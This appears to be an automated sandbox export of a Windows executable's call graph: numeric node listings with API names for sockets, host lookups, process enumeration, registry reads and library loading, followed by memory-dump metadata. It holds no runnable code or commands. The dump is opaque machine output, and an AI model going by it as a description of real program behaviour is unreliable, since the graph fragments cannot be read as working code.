execution_graph: [serialized node/edge listing of the interactive execution graph; only function addresses and API names survive in text form, e.g. DefWindowProcW, Shell_NotifyIconW, KillTimer, SetTimer, RegisterWindowMessageW, CreatePopupMenu, PostQuitMessage, LoadStringW, RtlAllocateHeap, GetModuleHandleW, GetProcAddress, ExitProcess, VariantClear, GetModuleFileNameW, RegOpenKeyExW, RegQueryValueExW]
83677->83678 83679 40e4eb 83677->83679 83680 4271b0 83678->83680 83681 42721a RegCloseKey 83678->83681 83679->83666 83682 4115d7 52 API calls 83680->83682 83681->83666 83683 4271cb 83682->83683 83738 43652f 52 API calls 83683->83738 83685 4271d8 RegQueryValueExW 83686 42720e 83685->83686 83687 4271f7 83685->83687 83686->83681 83688 402160 52 API calls 83687->83688 83688->83686 83691 41389e 83689->83691 83696 41381a 83689->83696 83690 4139e8 83716 417f77 46 API calls __getptd_noexit 83690->83716 83691->83690 83693 413a00 83691->83693 83718 417f77 46 API calls __getptd_noexit 83693->83718 83694 4139ed 83717 417f25 10 API calls strtoxl 83694->83717 83696->83691 83699 41388a 83696->83699 83711 419e30 46 API calls 2 library calls 83696->83711 83698 413967 83698->83656 83699->83691 83710 413909 83699->83710 83712 419e30 46 API calls 2 library calls 83699->83712 83701 41396c 83701->83691 83701->83698 83704 41397a 83701->83704 83702 413929 83702->83691 83703 413945 83702->83703 83713 419e30 46 API calls 2 library calls 83702->83713 83703->83691 83703->83698 83707 41395b 83703->83707 83715 419e30 46 API calls 2 library calls 83704->83715 83714 419e30 46 API calls 2 library calls 83707->83714 83710->83701 83710->83702 83711->83699 83712->83710 83713->83703 83714->83698 83715->83698 83716->83694 83717->83698 83718->83698 83720 419f13 83719->83720 83721 419f0e 83719->83721 83728 417f77 46 API calls __getptd_noexit 83720->83728 83721->83720 83724 419f2b 83721->83724 83723 419f18 83729 417f25 10 API calls strtoxl 83723->83729 83727 40e454 83724->83727 83730 417f77 46 API calls __getptd_noexit 83724->83730 83727->83659 83728->83723 83729->83727 83730->83723 83732 403367 83731->83732 83733 403358 83731->83733 83734 4115d7 52 API calls 83732->83734 83733->83677 83735 403370 83734->83735 83736 4115d7 52 API calls 83735->83736 83737 40339e 83736->83737 83737->83677 83738->83685 83739 42b14b 83746 40bc10 83739->83746 83741 42b159 83757 4096a0 83741->83757 83743 42b177 83884 44b92d 
VariantClear 83743->83884 83745 42bc5b 83747 40bc24 83746->83747 83748 40bc17 83746->83748 83750 40bc2a 83747->83750 83751 40bc3c 83747->83751 83885 408e80 VariantClear 83748->83885 83886 408e80 VariantClear 83750->83886 83754 4115d7 52 API calls 83751->83754 83752 40bc1f 83752->83741 83756 40bc43 83754->83756 83755 40bc33 83755->83741 83756->83741 83758 4096c6 _wcslen 83757->83758 83759 4115d7 52 API calls 83758->83759 83820 40a70c ctype _memmove 83758->83820 83760 4096fa _memmove 83759->83760 83762 4115d7 52 API calls 83760->83762 83764 40971b 83762->83764 83763 4297aa 83765 4115d7 52 API calls 83763->83765 83766 409749 CharUpperBuffW 83764->83766 83768 40976a ctype 83764->83768 83764->83820 83808 4297d1 _memmove 83765->83808 83766->83768 83816 4097e5 ctype 83768->83816 83996 47dcbb 465 API calls 83768->83996 83770 408f40 VariantClear 83771 42ae92 83770->83771 84048 410c60 VariantClear ctype 83771->84048 83773 42aea4 83774 409aa2 83776 4115d7 52 API calls 83774->83776 83780 409afe 83774->83780 83774->83808 83775 40a689 83777 4115d7 52 API calls 83775->83777 83776->83780 83793 40a6af ctype _memmove 83777->83793 83779 409b2a 83783 429dbe 83779->83783 83844 409b4d ctype _memmove 83779->83844 84027 40b400 VariantClear VariantClear ctype 83779->84027 83780->83779 83781 4115d7 52 API calls 83780->83781 83782 429d31 83781->83782 83785 429d42 83782->83785 84024 44a801 52 API calls 83782->84024 83787 429dd3 83783->83787 84028 40b400 VariantClear VariantClear ctype 83783->84028 83784 409fd2 83790 40a045 83784->83790 83846 42a3f5 83784->83846 83798 40e0a0 52 API calls 83785->83798 83787->83844 84029 40e1c0 VariantClear ctype 83787->84029 83788 429a46 VariantClear 83788->83816 83795 4115d7 52 API calls 83790->83795 83791 408f40 VariantClear 83791->83816 83800 4115d7 52 API calls 83793->83800 83801 40a04c 83795->83801 83797 4115d7 52 API calls 83797->83816 83802 429d57 83798->83802 83800->83820 83806 40a0a7 83801->83806 83887 4091e0 83801->83887 84025 453443 52 API calls 
83802->84025 83804 42a42f 84034 45e737 90 API calls 3 library calls 83804->84034 83829 40a0af 83806->83829 84035 40c790 VariantClear ctype 83806->84035 83807 4299d9 83811 408f40 VariantClear 83807->83811 84047 45e737 90 API calls 3 library calls 83808->84047 83815 4299e2 83811->83815 83812 429abd 83812->83743 83813 429d88 84026 453443 52 API calls 83813->84026 84016 410c60 VariantClear ctype 83815->84016 83816->83774 83816->83775 83816->83788 83816->83791 83816->83793 83816->83797 83816->83807 83816->83808 83816->83812 83824 42a452 83816->83824 83953 40a780 83816->83953 83997 40c2c0 83816->83997 84015 40c4e0 465 API calls 83816->84015 84017 40ba10 83816->84017 84023 40e270 VariantClear ctype 83816->84023 83995 4013a0 52 API calls 83820->83995 83823 402780 52 API calls 83823->83844 83824->83770 83825 44a801 52 API calls 83825->83844 83827 408f40 VariantClear 83857 40a162 ctype _memmove 83827->83857 83828 41130a 51 API calls __cinit 83828->83844 83830 40a11b 83829->83830 83831 42a4b4 VariantClear 83829->83831 83829->83857 83837 40a12d ctype 83830->83837 84036 40e270 VariantClear ctype 83830->84036 83831->83837 83832 40a780 451 API calls 83832->83844 83835 401980 53 API calls 83835->83844 83836 4115d7 52 API calls 83836->83857 83837->83836 83837->83857 83840 42a74d VariantClear 83840->83857 83841 4115d7 52 API calls 83841->83844 83842 40a368 83845 42aad4 83842->83845 83852 40a397 83842->83852 83843 40e270 VariantClear 83843->83857 83844->83784 83844->83804 83844->83820 83844->83823 83844->83825 83844->83828 83844->83832 83844->83835 83844->83841 83844->83846 83850 409c95 83844->83850 84030 45f508 52 API calls 83844->84030 84031 403e10 53 API calls 83844->84031 84032 408e80 VariantClear 83844->84032 84040 46fe90 VariantClear VariantClear ctype 83845->84040 84033 47390f VariantClear 83846->84033 83847 42a7e4 VariantClear 83847->83857 83848 42a886 VariantClear 83848->83857 83850->83743 83851 40a3ce 83864 40a3d9 ctype 83851->83864 84041 40b400 VariantClear VariantClear 
ctype 83851->84041 83852->83851 83877 40a42c ctype 83852->83877 83994 40b400 VariantClear VariantClear ctype 83852->83994 83855 42abaf 83860 42abd4 VariantClear 83855->83860 83871 40a4ee ctype 83855->83871 83856 4115d7 52 API calls 83856->83857 83857->83827 83857->83840 83857->83842 83857->83843 83857->83845 83857->83847 83857->83848 83857->83856 83859 4115d7 52 API calls 83857->83859 84037 470870 52 API calls 83857->84037 84038 408e80 VariantClear 83857->84038 84039 44ccf1 VariantClear ctype 83857->84039 83858 40a4dc 83858->83871 84043 40e270 VariantClear ctype 83858->84043 83861 42a5a6 VariantInit VariantCopy 83859->83861 83860->83871 83861->83857 83866 42a5c6 VariantClear 83861->83866 83862 42ac4f 83870 42ac79 VariantClear 83862->83870 83875 40a546 ctype 83862->83875 83865 40a41a 83864->83865 83868 42ab44 VariantClear 83864->83868 83864->83877 83865->83877 84042 40e270 VariantClear ctype 83865->84042 83866->83857 83867 40a534 83867->83875 84044 40e270 VariantClear ctype 83867->84044 83868->83877 83870->83875 83871->83862 83871->83867 83872 42ad28 83878 42ad4e VariantClear 83872->83878 83883 40a583 ctype 83872->83883 83875->83872 83876 40a571 83875->83876 83876->83883 84045 40e270 VariantClear ctype 83876->84045 83877->83855 83877->83858 83878->83883 83880 40a650 ctype 83880->83743 83881 42ae0e VariantClear 83881->83883 83883->83880 83883->83881 84046 40e270 VariantClear ctype 83883->84046 83884->83745 83885->83752 83886->83755 83888 409202 83887->83888 83889 42d7ad 83887->83889 83946 409216 ctype 83888->83946 84193 410940 465 API calls 83888->84193 84196 45e737 90 API calls 3 library calls 83889->84196 83892 409386 83893 40939c 83892->83893 84194 40f190 10 API calls 83892->84194 83893->83806 83895 4095b2 83895->83893 83897 4095bf 83895->83897 83896 409253 PeekMessageW 83896->83946 84195 401a50 465 API calls 83897->84195 83899 42d8cd Sleep 83899->83946 83900 4095c6 LockWindowUpdate DestroyWindow GetMessageW 83900->83893 83903 4095f9 83900->83903 83902 42e13b 
84221 40d410 VariantClear 83902->84221 83906 42e158 TranslateMessage DispatchMessageW GetMessageW 83903->83906 83906->83906 83907 42e188 83906->83907 83907->83893 83909 409567 PeekMessageW 83909->83946 83911 44c29d 52 API calls 83952 42da45 83911->83952 83912 46f3c1 107 API calls 83912->83946 83913 40e0a0 52 API calls 83913->83946 83914 46fdbf 108 API calls 83914->83952 83915 42dcd2 WaitForSingleObject 83919 42dcf0 GetExitCodeProcess CloseHandle 83915->83919 83915->83946 83916 409551 TranslateMessage DispatchMessageW 83916->83909 83918 42dd3d Sleep 83918->83952 84202 40d410 VariantClear 83919->84202 83921 4094cf Sleep 83921->83946 83924 40d410 VariantClear 83924->83946 83925 408f40 VariantClear 83925->83952 83927 42d94d timeGetTime 84198 465124 53 API calls 83927->84198 83929 40c620 timeGetTime 83929->83946 83932 465124 53 API calls 83932->83952 83933 42dd89 CloseHandle 83933->83952 83934 47d33e 443 API calls 83934->83946 83936 42de19 GetExitCodeProcess CloseHandle 83936->83952 83938 401b10 52 API calls 83938->83952 83940 42de88 Sleep 83940->83946 83942 4096a0 443 API calls 83942->83946 83945 45e737 90 API calls 83945->83946 83946->83892 83946->83896 83946->83899 83946->83902 83946->83909 83946->83912 83946->83913 83946->83915 83946->83916 83946->83918 83946->83921 83946->83924 83946->83927 83946->83929 83946->83934 83946->83942 83946->83945 83947 42e0cc VariantClear 83946->83947 83948 408f40 VariantClear 83946->83948 83946->83952 84049 4091b0 83946->84049 84107 40afa0 83946->84107 84133 408fc0 83946->84133 84168 408cc0 83946->84168 84182 40d150 83946->84182 84187 40d170 83946->84187 84197 465124 53 API calls 83946->84197 84220 40e270 VariantClear ctype 83946->84220 83947->83946 83948->83946 83950 401980 53 API calls 83950->83952 83952->83911 83952->83914 83952->83925 83952->83932 83952->83933 83952->83936 83952->83938 83952->83940 83952->83946 83952->83950 84199 45178a 54 API calls 83952->84199 84200 47d33e 465 API calls 83952->84200 84201 453bc6 54 API calls 
83952->84201 84203 40c620 timeGetTime 83952->84203 84204 40d410 VariantClear 83952->84204 84205 443d19 83952->84205 84213 4574b4 VariantClear 83952->84213 84214 403cd0 83952->84214 84218 4731e1 VariantClear 83952->84218 84219 4331a2 6 API calls 83952->84219 83954 40a7a6 83953->83954 83955 40ae8c 83953->83955 83957 4115d7 52 API calls 83954->83957 85906 41130a 51 API calls __cinit 83955->85906 83991 40a7c6 ctype _memmove 83957->83991 83958 40a86d 83959 40abd1 83958->83959 83975 40a878 ctype 83958->83975 85911 45e737 90 API calls 3 library calls 83959->85911 83960 401b10 52 API calls 83960->83991 83962 40bc10 53 API calls 83962->83991 83963 408e80 VariantClear 83963->83991 83964 42b791 VariantClear 83964->83991 83965 42ba2d VariantClear 83965->83991 83966 408f40 VariantClear 83966->83975 83967 42b459 VariantClear 83967->83991 83968 40a884 ctype 83968->83816 83969 408cc0 458 API calls 83969->83991 83970 42b6f6 VariantClear 83970->83991 83971 4115d7 52 API calls 83971->83991 83973 42bc5b 83973->83816 83974 42bb6a 85914 44b92d VariantClear 83974->85914 83975->83966 83975->83968 83976 40e270 VariantClear 83976->83991 83977 42bbf5 85912 45e737 90 API calls 3 library calls 83977->85912 83979 4115d7 52 API calls 83983 42b5b3 VariantInit VariantCopy 83979->83983 83980 40b5f0 89 API calls 83980->83991 83982 408f40 VariantClear 83982->83991 83985 42b5d7 VariantClear 83983->83985 83983->83991 83985->83991 83987 42bc37 85913 45e737 90 API calls 3 library calls 83987->85913 83990 42bc48 83990->83974 83992 408f40 VariantClear 83990->83992 83991->83958 83991->83959 83991->83960 83991->83962 83991->83963 83991->83964 83991->83965 83991->83967 83991->83969 83991->83970 83991->83971 83991->83974 83991->83976 83991->83977 83991->83979 83991->83980 83991->83982 83991->83987 83993 4530c9 VariantClear 83991->83993 85907 45308a 53 API calls 83991->85907 85908 470870 52 API calls 83991->85908 85909 457f66 87 API calls __write_nolock 83991->85909 85910 472f47 127 API calls 83991->85910 
83992->83974 83993->83991 83994->83851 83995->83763 83996->83768 83998 40c2c7 83997->83998 83999 40c30e 83997->83999 84000 40c2d3 83998->84000 84001 426c79 83998->84001 84002 40c315 83999->84002 84003 426c2b 83999->84003 85915 403ea0 52 API calls __cinit 84000->85915 85920 4534e3 52 API calls 84001->85920 84007 40c321 84002->84007 84012 426c5a 84002->84012 84005 426c4b 84003->84005 84006 426c2e 84003->84006 85918 4534e3 52 API calls 84005->85918 84014 40c2de 84006->84014 85917 4534e3 52 API calls 84006->85917 85916 403ea0 52 API calls __cinit 84007->85916 85919 4534e3 52 API calls 84012->85919 84014->83816 84015->83816 84016->83880 84018 40ba49 84017->84018 84021 40ba1b ctype _memmove 84017->84021 84020 4115d7 52 API calls 84018->84020 84019 4115d7 52 API calls 84022 40ba22 84019->84022 84020->84021 84021->84019 84022->83816 84023->83816 84024->83785 84025->83813 84026->83779 84027->83783 84028->83787 84029->83844 84030->83844 84031->83844 84032->83844 84033->83804 84034->83824 84035->83806 84036->83837 84037->83857 84038->83857 84039->83857 84040->83851 84041->83864 84042->83877 84043->83871 84044->83875 84045->83883 84046->83883 84047->83824 84048->83773 84050 42c5fe 84049->84050 84065 4091c6 84049->84065 84051 40bc70 52 API calls 84050->84051 84050->84065 84052 42c64e InterlockedIncrement 84051->84052 84053 42c665 84052->84053 84058 42c697 84052->84058 84055 42c672 InterlockedDecrement Sleep InterlockedIncrement 84053->84055 84053->84058 84054 42c737 InterlockedDecrement 84056 42c74a 84054->84056 84055->84053 84055->84058 84059 408f40 VariantClear 84056->84059 84057 42c731 84057->84054 84058->84054 84058->84057 84222 408e80 VariantClear 84058->84222 84061 42c752 84059->84061 84236 410c60 VariantClear ctype 84061->84236 84062 42c6cf 84223 45340c 84062->84223 84065->83946 84066 42c6db 84067 402160 52 API calls 84066->84067 84068 42c6e5 84067->84068 84069 45340c 85 API calls 84068->84069 84070 42c6f1 84069->84070 84229 40d200 52 API calls 2 library calls 
84070->84229 84072 42c6fb 84230 465124 53 API calls 84072->84230 84074 42c715 84075 42c76a 84074->84075 84076 42c719 84074->84076 84237 401b10 84075->84237 84231 46fe32 84076->84231 84079 42c77e 84080 401980 53 API calls 84079->84080 84085 42c796 84080->84085 84081 42c812 84082 46fe32 VariantClear 84081->84082 84083 42c82a InterlockedDecrement 84082->84083 84243 46ff07 54 API calls 84083->84243 84085->84081 84086 42c864 84085->84086 84087 40ba10 52 API calls 84085->84087 84244 45e737 90 API calls 3 library calls 84086->84244 84087->84085 84088 42c9ec 84246 47d33e 465 API calls 84088->84246 84091 42c9fe 84247 46feb1 VariantClear VariantClear 84091->84247 84093 408f40 VariantClear 84103 42c849 84093->84103 84094 42ca08 84097 401b10 52 API calls 84094->84097 84095 408f40 VariantClear 84099 42c891 84095->84099 84096 402780 52 API calls 84096->84103 84098 42ca15 84097->84098 84100 40c2c0 52 API calls 84098->84100 84245 410c60 VariantClear ctype 84099->84245 84104 42c874 84100->84104 84102 401980 53 API calls 84102->84103 84103->84088 84103->84093 84103->84096 84103->84102 84105 40a780 459 API calls 84103->84105 84104->84095 84106 42ca59 84104->84106 84105->84103 84106->84106 84108 40afc4 84107->84108 84109 40b156 84107->84109 84110 40afd5 84108->84110 84111 42d1e3 84108->84111 84250 45e737 90 API calls 3 library calls 84109->84250 84115 40a780 463 API calls 84110->84115 84129 40b11a ctype 84110->84129 84251 45e737 90 API calls 3 library calls 84111->84251 84114 42d1f8 84120 408f40 VariantClear 84114->84120 84117 40b00a 84115->84117 84116 40b143 84116->83946 84117->84114 84121 40b012 84117->84121 84119 42d4db 84119->84119 84120->84116 84122 40b04a 84121->84122 84123 42d231 VariantClear 84121->84123 84131 40b094 ctype 84121->84131 84130 40b05c ctype 84122->84130 84252 40e270 VariantClear ctype 84122->84252 84123->84130 84124 40b108 84124->84129 84253 40e270 VariantClear ctype 84124->84253 84125 42d45a VariantClear 84125->84129 84128 4115d7 52 API calls 84128->84131 
84129->84116 84254 45e737 90 API calls 3 library calls 84129->84254 84130->84128 84130->84131 84131->84124 84132 42d425 ctype 84131->84132 84132->84125 84132->84129 84134 408fff 84133->84134 84138 40900d 84133->84138 84255 403ea0 52 API calls __cinit 84134->84255 84137 42c3f6 84259 45e737 90 API calls 3 library calls 84137->84259 84138->84137 84140 42c44a 84138->84140 84141 40a780 465 API calls 84138->84141 84144 42c47b 84138->84144 84145 42c4cb 84138->84145 84146 42c564 84138->84146 84150 42c548 84138->84150 84153 409112 84138->84153 84155 42c528 84138->84155 84157 4090df 84138->84157 84158 4090ea 84138->84158 84167 4090f2 ctype 84138->84167 84258 4534e3 52 API calls 84138->84258 84260 40c4e0 465 API calls 84138->84260 84261 45e737 90 API calls 3 library calls 84140->84261 84141->84138 84262 451b42 61 API calls 84144->84262 84264 47faae 465 API calls 84145->84264 84151 408f40 VariantClear 84146->84151 84148 42c491 84148->84167 84263 45e737 90 API calls 3 library calls 84148->84263 84267 45e737 90 API calls 3 library calls 84150->84267 84151->84167 84152 42c4da 84152->84167 84265 45e737 90 API calls 3 library calls 84152->84265 84153->84150 84160 40912b 84153->84160 84266 45e737 90 API calls 3 library calls 84155->84266 84157->84158 84256 408e80 VariantClear 84157->84256 84163 408f40 VariantClear 84158->84163 84160->84167 84257 403e10 53 API calls 84160->84257 84163->84167 84165 40914b 84166 408f40 VariantClear 84165->84166 84166->84167 84167->83946 84268 408d90 84168->84268 84170 408cf9 84171 429778 84170->84171 84174 42976c 84170->84174 84176 408d2d 84170->84176 84309 410c60 VariantClear ctype 84171->84309 84173 429780 84308 45e737 90 API calls 3 library calls 84174->84308 84284 403d10 84176->84284 84179 408d71 ctype 84179->83946 84180 408f40 VariantClear 84181 408d45 ctype 84180->84181 84181->84179 84181->84180 84184 425c87 84182->84184 84186 40d15f 84182->84186 84183 425cc7 84184->84183 84185 425ca1 TranslateAcceleratorW 84184->84185 84185->84186 84186->83946 
84188 42602f 84187->84188 84192 40d17f 84187->84192 84188->83946 84189 40d18c 84189->83946 84190 42608e IsDialogMessageW 84190->84189 84190->84192 84192->84189 84192->84190 85855 430c46 GetClassLongW 84192->85855 84193->83946 84194->83895 84195->83900 84196->83946 84197->83946 84198->83946 84199->83952 84200->83952 84201->83952 84202->83952 84203->83952 84204->83952 84206 443d51 84205->84206 84207 443d33 _wcslen 84205->84207 85857 433ee0 CreateToolhelp32Snapshot Process32FirstW 84206->85857 84207->84206 84210 443d41 84207->84210 84209 443d59 84209->83952 85856 433d9e 63 API calls 4 library calls 84210->85856 84212 443d49 84212->83952 84213->83952 84215 403cdf 84214->84215 84216 408f40 VariantClear 84215->84216 84217 403ce7 84216->84217 84217->83940 84218->83952 84219->83952 84220->83946 84221->83892 84222->84062 84224 453439 84223->84224 84225 453419 84223->84225 84224->84066 84226 45342f 84225->84226 84248 4531b1 85 API calls 5 library calls 84225->84248 84226->84066 84228 453425 84228->84066 84229->84072 84230->84074 84232 46fe66 84231->84232 84233 46fe41 84231->84233 84232->84057 84235 46fe59 84233->84235 84249 40e1c0 VariantClear ctype 84233->84249 84235->84057 84236->84065 84238 401b16 _wcslen 84237->84238 84239 4115d7 52 API calls 84238->84239 84242 401b63 84238->84242 84240 401b4b _memmove 84239->84240 84241 4115d7 52 API calls 84240->84241 84241->84242 84242->84079 84243->84103 84244->84104 84245->84065 84246->84091 84247->84094 84248->84228 84249->84233 84250->84111 84251->84114 84252->84130 84253->84129 84254->84119 84255->84138 84256->84158 84257->84165 84258->84138 84259->84167 84260->84138 84261->84167 84262->84148 84263->84167 84264->84152 84265->84167 84266->84167 84267->84146 84269 4289d2 84268->84269 84270 408db3 84268->84270 84314 45e737 90 API calls 3 library calls 84269->84314 84310 40bec0 84270->84310 84273 4289e5 84315 45e737 90 API calls 3 library calls 84273->84315 84274 408e5a 84274->84170 84276 40ba10 52 API calls 84282 408dc9 84276->84282 
84277 428a05 84278 408f40 VariantClear 84277->84278 84278->84274 84279 40a780 465 API calls 84279->84282 84280 408e64 84281 408f40 VariantClear 84280->84281 84281->84274 84282->84273 84282->84274 84282->84276 84282->84277 84282->84279 84282->84280 84283 408f40 VariantClear 84282->84283 84283->84282 84285 408f40 VariantClear 84284->84285 84286 403d20 84285->84286 84287 403cd0 VariantClear 84286->84287 84288 403d4d 84287->84288 84317 47ac6d 84288->84317 84332 457e3f 84288->84332 84343 477638 84288->84343 84367 46cef3 84288->84367 84409 46d230 84288->84409 84433 40d3b0 84288->84433 84440 46beb2 84288->84440 84513 4653c8 84288->84513 84531 457655 84288->84531 84538 457e22 84288->84538 84541 4755c4 84288->84541 84563 4589ac WSAStartup 84288->84563 84567 45774c 84288->84567 84578 46d402 84288->84578 84597 46e1a6 84288->84597 84645 46d1a6 84288->84645 84655 46f5e2 84288->84655 84691 4755ad 84288->84691 84289 403d76 84289->84171 84289->84181 84308->84171 84309->84173 84311 40bed0 84310->84311 84312 40bef2 84311->84312 84316 45e737 90 API calls 3 library calls 84311->84316 84312->84282 84314->84273 84315->84277 84316->84312 84694 471f53 84317->84694 84319 47ac84 84705 46f3c1 84319->84705 84321 47ac8c 84322 47acc2 84321->84322 84323 47ac90 84321->84323 84324 40bc70 52 API calls 84322->84324 84325 408f40 VariantClear 84323->84325 84326 47accb 84324->84326 84327 47acab 84325->84327 84721 461383 84326->84721 84327->84289 84329 47acdc 84736 40e6a0 53 API calls 84329->84736 84331 47ace8 84331->84289 84333 45340c 85 API calls 84332->84333 84334 457e61 84333->84334 84335 443d19 67 API calls 84334->84335 84336 457e67 84335->84336 84337 457e71 84336->84337 84338 457e9d 84336->84338 84339 408f40 VariantClear 84337->84339 84340 408f40 VariantClear 84338->84340 84341 457e76 84339->84341 84342 457ea2 84340->84342 84341->84289 84342->84289 84344 477652 84343->84344 84345 45340c 85 API calls 84344->84345 84346 477685 84345->84346 84815 44ad65 84346->84815 84368 45340c 85 API calls 
84367->84368 84369 46cf16 84368->84369 84370 40bc70 52 API calls 84369->84370 84371 46cf23 84370->84371 84372 40bc70 52 API calls 84371->84372 84373 46cf41 84372->84373 84820 40e710 84373->84820 84376 46cf70 _wcslen 84378 46cf85 84376->84378 84379 46d0f2 84376->84379 84377 46cf61 OleInitialize 84377->84376 84831 4339fa 84378->84831 84381 46d119 GetActiveObject 84379->84381 84382 45340c 85 API calls 84379->84382 84386 46d029 84381->84386 84389 46d133 84381->84389 84385 46d10a CLSIDFromProgID 84382->84385 84384 46d018 CreateBindCtx 84384->84386 84388 46d055 MkParseDisplayName 84384->84388 84385->84381 84385->84386 84838 451b42 61 API calls 84386->84838 84387 402160 52 API calls 84407 46cf9f 84387->84407 84391 46d06f 84388->84391 84392 46d0dc 84388->84392 84389->84386 84394 46d170 84389->84394 84397 46d0a7 84391->84397 84839 451b42 61 API calls 84391->84839 84841 451b42 61 API calls 84392->84841 84842 468070 104 API calls ctype 84394->84842 84396 46d036 84396->84289 84405 46d0c7 84397->84405 84840 468070 104 API calls ctype 84397->84840 84400 46cff8 84401 46d014 84400->84401 84837 40bd50 52 API calls 84400->84837 84401->84384 84405->84289 84407->84400 84408 40c600 52 API calls 84407->84408 84834 465177 52 API calls 84407->84834 84835 40bd50 52 API calls 84407->84835 84836 403020 52 API calls _memmove 84407->84836 84408->84407 84410 46d24b 84409->84410 84411 40e710 53 API calls 84410->84411 84412 46d268 84411->84412 84413 46d393 select 84412->84413 84418 46d271 84412->84418 84414 46d3e2 WSAGetLastError 84413->84414 84415 46d279 84413->84415 84414->84418 84416 4115d7 52 API calls 84415->84416 84417 46d283 __WSAFDIsSet 84416->84417 84419 46d29e #16 84417->84419 84420 46d342 ctype _memmove 84417->84420 84418->84289 84421 46d36a WSAGetLastError 84419->84421 84422 46d2b7 _strlen 84419->84422 84420->84289 84424 46d35f ctype 84421->84424 84423 46d2d7 84422->84423 84422->84424 84425 46d2f1 84422->84425 84851 453132 53 API calls setSBCS 84423->84851 84424->84289 84848 444e90 52 
API calls 2 library calls 84425->84848 84428 46d2fb 84849 466715 54 API calls 84428->84849 84430 46d308 84850 40e6a0 53 API calls 84430->84850 84432 46d312 ctype 84432->84289 84434 40d3c4 84433->84434 84435 40d3cc timeGetTime 84434->84435 84436 42e19d Sleep 84434->84436 84437 40d3e2 84435->84437 84438 4091e0 463 API calls 84437->84438 84439 40d3fb 84438->84439 84439->84289 84441 40bc70 52 API calls 84440->84441 84442 46bed3 84441->84442 84443 40bc70 52 API calls 84442->84443 84444 46bedc 84443->84444 84445 40bc70 52 API calls 84444->84445 84446 46bee5 84445->84446 84447 40e710 53 API calls 84446->84447 84448 46bef2 84447->84448 84449 45340c 85 API calls 84448->84449 84450 46bf00 84449->84450 84451 401b10 52 API calls 84450->84451 84452 46bf0c 84451->84452 84852 463980 84452->84852 84514 4653e2 84513->84514 84515 4533eb 85 API calls 84514->84515 84516 4653e9 84515->84516 84908 465225 84516->84908 84518 4653f4 84519 465420 84518->84519 84520 4653f8 socket 84518->84520 84523 408f40 VariantClear 84519->84523 84521 46543f connect 84520->84521 84522 46540b WSAGetLastError 84520->84522 84524 465450 84521->84524 84525 46546b WSAGetLastError 84521->84525 84522->84519 84526 465428 84523->84526 84527 408f40 VariantClear 84524->84527 84914 403c90 84525->84914 84526->84289 84529 465458 84527->84529 84529->84289 84530 465480 closesocket 84530->84519 84534 457669 84531->84534 84532 4576c3 84533 408f40 VariantClear 84532->84533 84535 4576cb 84533->84535 84534->84532 84536 457684 VirtualFree 84534->84536 84535->84289 84537 4576a6 84536->84537 84537->84289 84917 457c53 84538->84917 84540 457e3a 84540->84289 84542 4755d1 __write_nolock 84541->84542 84543 40bc70 52 API calls 84542->84543 84544 4755e3 84543->84544 84545 4755fa CreateToolhelp32Snapshot Process32FirstW 84544->84545 84549 475624 _wcscat 84545->84549 84546 413a0e __wsplitpath 46 API calls 84546->84549 84547 45340c 85 API calls 84547->84549 84548 402160 52 API calls 84548->84549 84549->84546 84549->84547 84549->84548 84551 
4756a3 Process32NextW 84549->84551 84952 4114ab 84549->84952 84551->84549 84552 4756b9 CloseHandle 84551->84552 84553 40e830 53 API calls 84552->84553 84554 4756d3 84553->84554 84960 40cf00 53 API calls 84554->84960 84556 4756e0 84557 408f40 VariantClear 84556->84557 84560 4756ea 84557->84560 84558 40cf00 53 API calls 84558->84560 84559 47577c 84559->84289 84560->84558 84560->84559 84561 40e710 53 API calls 84560->84561 84562 408f40 VariantClear 84560->84562 84561->84560 84562->84560 84564 4589dd 84563->84564 84964 4530c9 VariantClear 84564->84964 84566 4589f4 84566->84289 84568 45340c 85 API calls 84567->84568 84569 457760 LoadLibraryW 84568->84569 84570 45776e 84569->84570 84573 45778a 84569->84573 84571 408f40 VariantClear 84570->84571 84574 457776 84571->84574 84572 4577c2 84576 408f40 VariantClear 84572->84576 84573->84572 84965 436299 52 API calls 2 library calls 84573->84965 84574->84289 84577 4577d7 84576->84577 84577->84289 84966 40d370 84578->84966 84581 4533eb 85 API calls 84582 46d422 84581->84582 84971 45f645 WideCharToMultiByte 84582->84971 84584 46d429 gethostbyname 84585 46d437 WSAGetLastError 84584->84585 84586 46d469 _memmove 84584->84586 84588 46d44c 84585->84588 84587 46d47a inet_ntoa 84586->84587 84980 45213b 52 API calls 2 library calls 84587->84980 84590 40e710 53 API calls 84588->84590 84592 46d459 84590->84592 84591 46d491 84981 466715 54 API calls 84591->84981 84592->84289 84594 46d49e 84982 40e6a0 53 API calls 84594->84982 84596 46d4a8 84596->84289 84598 46e1c0 84597->84598 84599 4533eb 85 API calls 84598->84599 84601 46e1dc 84599->84601 84600 46e483 84600->84289 84601->84600 84602 46e2e7 84601->84602 84603 46e1e9 84601->84603 84985 40f760 84602->84985 84604 45340c 85 API calls 84603->84604 84611 46e1f4 _wcscpy _wcschr 84604->84611 84619 46e216 _wcscat _wcscpy 84611->84619 84623 46e248 _wcscat 84611->84623 84612 46e2c8 84615 408f40 VariantClear 84612->84615 84617 46e2d0 84615->84617 84616 45340c 85 API calls 84618 46e264 _wcscpy 
40ca30 87118->87119 87120 408f40 VariantClear 87119->87120 87121 40ca38 GetStdHandle 87120->87121 87122 429630 87121->87122 87123 40ca87 87121->87123 87122->87123 87124 429639 87122->87124 87129 41130a 51 API calls __cinit 87123->87129 87135 4432c0 57 API calls 87124->87135 87126 429641 87136 44b6ab CreateThread 87126->87136 87128 42964f CloseHandle 87128->87123 87129->87094 87130->87097 87131->87099 87132->87111 87133->87113 87134->87117 87135->87126 87136->87128 87137 44b5cb 58 API calls 87136->87137
APIs
• _wcslen.LIBCMT ref: 004096C1
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• _memmove.LIBCMT ref: 0040970C
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
• CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
• _memmove.LIBCMT ref: 00409D96
• _memmove.LIBCMT ref: 0040A6C4
• _memmove.LIBCMT ref: 004297E5
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
